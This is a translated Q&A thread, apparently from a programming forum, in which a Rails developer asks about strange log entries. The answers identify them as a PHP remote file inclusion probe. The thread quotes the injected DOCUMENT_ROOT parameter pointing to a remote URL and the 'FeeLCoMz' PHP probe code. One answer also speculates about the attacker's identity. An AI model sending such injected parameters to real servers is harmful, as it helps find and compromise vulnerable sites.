Странные запросы с корейского сайта
В последнее время я обнаружил много странных запросов, подобных этому, в моем приложении rails:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}
ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}):
Похоже, это автоматизировано, так как я получаю их много и замечаю странные параметры, которые они пытаются отправить:
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
Это что-то злое и если да, что мне с этим делать?
3 ответа
Если вы откроете ссылочный документ на корейском сервере (я, вероятно, не должен был это делать, но я сделал;), он говорит:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Поиски в сети, похоже, это эксплойт для Joomla, Wordpress и / или Firestats (разные сайты упоминают разные цели). Если вы используете какой-либо из них, обязательно обновите его до последней версии.
Более подробная информация здесь: http://urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/ и здесь: http://tech.sweetnam.eu/2009/06/firestats-wordpress-exploit/
Это не эксплойт: он просто пытается найти уязвимые серверы, которые позволяют заменить $_SERVER['DOCUMENT_ROOT'] Переменная PHP
Это работает так: если сервер уязвим, на страницу выводится "FeeLCoMz". Это обнаруживается скриптом, который отправил запрос, и сайт добавляется в базу данных серверов, которые скоро станут гордыми участниками ботнета:)
Код, вставленный Шоном Эрпом выше, является всего лишь тестовым кодом, чтобы увидеть, уязвима ли ваша система или нет. Затем, если ваша система уязвима, наступает основная атака. Ваша система находится под контролем атакующего. Злоумышленник делает вашу систему сервером IRC для своих друзей и делится всеми вашими файлами с другими. или использует вашу систему в качестве жертвы для атаки на другие IP-номера. или удаляет все, что у вас есть, или вынимает ваши пароли, или подделывает данные ваших клиентов и т. д. В " Анатомии" есть статья и рассылка атак с удаленным введением кода. Здесь приводятся примеры некоторых реальных кодов атаки.
Я также некоторое время следил, чтобы узнать, кто такой FeelComz. То, что я нашел, - это бедный индонезийский ребенок, играющий днем и ночью на сайтах irc. У него есть личная страница на индонезийском сайте под названием Friendster. Кажется, он благодарит за помощь, которую вы сделали для его страны после цунами.